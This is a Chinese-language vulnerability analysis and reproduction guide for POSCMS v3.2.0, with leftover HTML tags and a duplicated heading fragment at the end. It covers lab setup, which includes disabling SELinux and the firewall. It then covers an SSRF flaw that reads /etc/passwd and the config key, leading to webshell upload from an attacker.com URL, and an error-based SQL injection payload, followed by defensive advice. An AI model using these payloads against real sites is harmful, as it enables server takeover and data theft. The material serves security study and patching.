POSCMS v3.2.0漏洞分析与复现指南<\/h1>

环境搭建<\/h2>

系统要求<\/h3>

操作系统: CentOS 7 amd64<\/li>
PHP版本: 5.5.38 (必须低于7.1)<\/li>
MySQL版本: 5.5.60<\/li>

Web服务器: Apache 2.4.6<\/li> <\/ul>

安装步骤<\/h3>

PHP环境配置<\/strong>:<\/li> <\/ol>
# 移除现有PHP<\/span> <\/span><\/span>yum list installed | grep php <\/span><\/span>yum remove php*.x86_64 <\/span><\/span> <\/span><\/span># 添加新的RPM仓库<\/span> <\/span><\/span>rpm -Uvh https:\/\/mirror.webtatic.com\/yum\/el7\/epel-release.rpm <\/span><\/span>rpm -Uvh https:\/\/mirror.webtatic.com\/yum\/el7\/webtatic-release.rpm <\/span><\/span> <\/span><\/span># 安装PHP 5.5<\/span> <\/span><\/span>yum install php55w.x86_64 php55w-cli.x86_64 php55w-common.x86_64 php55w-gd.x86_64 php55w-ldap.x86_64 php55w-mbstring.x86_64 php55w-mcrypt.x86_64 php55w-mysql.x86_64 php55w-pdo.x86_64 <\/span><\/span><\/code><\/pre> Apache配置<\/strong>: 修改\/etc\/httpd\/conf\/httpd.conf<\/code>:<\/li> <\/ol> <Directory "\/var\/www\/html"> AllowOverride All Require all granted User newman Group newman <\/Directory> <\/code><\/pre> 权限设置<\/strong>:<\/li> <\/ol> chown -R newman:newman \/var\/www\/html\/POSCMS <\/span><\/span><\/code><\/pre> 关闭安全服务<\/strong>:<\/li> <\/ol> # 清空iptables<\/span> <\/span><\/span>sudo iptables -F <\/span><\/span> <\/span><\/span># 临时关闭Selinux<\/span> <\/span><\/span>sudo setenforce 0<\/span> <\/span><\/span> <\/span><\/span># 停掉firewall服务<\/span> <\/span><\/span>sudo service firewalld stop <\/span><\/span><\/code><\/pre>漏洞1: SSRF及GetShell<\/h2> 漏洞位置<\/h3> \/diy\/module\/member\/controllers\/Api.php<\/code>中的down_file()<\/code>函数<\/p> 漏洞分析<\/h3> SSRF漏洞<\/strong>:<\/li> <\/ol> 使用dr_catcher_data()<\/code>函数获取远程文件内容<\/li> 未对请求协议和URL范围进行限制<\/li> 可读取服务器本地文件如\/etc\/passwd<\/code>和\/config\/system.php<\/code><\/li> <\/ul> GetShell实现<\/strong>:<\/li> <\/ol> 通过构造特殊payload绕过扩展名检查<\/li> 上传包含PHP代码的HTML文件<\/li> 利用Apache配置解析HTML中的PHP代码<\/li> <\/ul> 复现步骤<\/h3> 获取系统密钥<\/strong>: 通过SSRF读取\/config\/system.php<\/code>获取加密密钥<\/p> <\/li> 构造加密payload<\/strong>: 使用系统密钥加密1|html,|0<\/code>生成授权码<\/p> <\/li> 上传恶意文件<\/strong>:<\/p> <\/li> <\/ol> POST<\/span> \/index.php?s=member&c=api&m=down_file HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Host:<\/span> target.com<\/span> <\/span><\/span> <\/span><\/span>file=http:\/\/attacker.com\/shell.html&url=code=生成的授权码 <\/span><\/span><\/code><\/pre> Apache配置<\/strong>: 在\/etc\/httpd\/conf.d\/php.conf<\/code>中添加:<\/li> <\/ol> AddType application\/x-httpd-php .html <\/code><\/pre> 漏洞2: 前台SQL注入<\/h2> 漏洞位置<\/h3> \/diy\/dayrui\/models\/Attachment_model.php<\/code>中的搜索功能<\/p> 漏洞分析<\/h3> 未对module<\/code>参数进行过滤<\/li> 可直接拼接SQL语句<\/li> 报错注入可利用<\/li> <\/ul> 复现步骤<\/h3> 构造注入请求<\/strong>:<\/li> <\/ol> GET<\/span> \/index.php?s=member&c=account&m=attachment&module=photo%22%20or%20updatexml(1,concat(1,0x7e,user()),1);%23&ext= HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Host:<\/span> target.com<\/span> <\/span><\/span><\/code><\/pre> 获取数据库信息<\/strong>: 通过报错信息获取当前数据库用户等信息<\/li> <\/ol> 防御建议<\/h2> SSRF防御<\/strong>:<\/li> <\/ol> 限制dr_catcher_data()<\/code>可访问的协议和IP范围<\/li> 增加URL白名单验证<\/li> <\/ul> 文件上传防御<\/strong>:<\/li> <\/ol> 严格检查文件内容和扩展名<\/li> 禁止上传可执行文件<\/li> <\/ul> SQL注入防御<\/strong>:<\/li> <\/ol> 使用预处理语句<\/li> 对输入参数进行严格过滤<\/li> <\/ul> 系统加固<\/strong>:<\/li> <\/ol> 定期更新系统和组件<\/li> 最小化服务器权限<\/li> 禁用不必要的服务和功能<\/li> <\/ul> 参考资源<\/h2> POSCMS v3.2.0漏洞分析<\/a><\/li> SSRF漏洞利用技巧<\/a><\/li> PHP安全编程指南<\/a><\/li> <\/ol>

POSCMS v3.2.0漏洞分析与复现指南<\/h1>

环境搭建<\/h2>

漏洞1: SSRF及GetShell<\/h2>

漏洞位置<\/h3>
`\/diy\/module\/member\/controllers\/Api.php<\/code>中的down_file()<\/code>函数<\/p>`

漏洞2: 前台SQL注入<\/h2>

漏洞位置<\/h3>
`\/diy\/dayrui\/models\/Attachment_model.php<\/code>中的搜索功能<\/p>`

参考资源<\/h2>

POSCMS v3.2.0漏洞分析<\/a><\/li>
SSRF漏洞利用技巧<\/a><\/li>
PHP安全编程指南<\/a><\/li> <\/ol>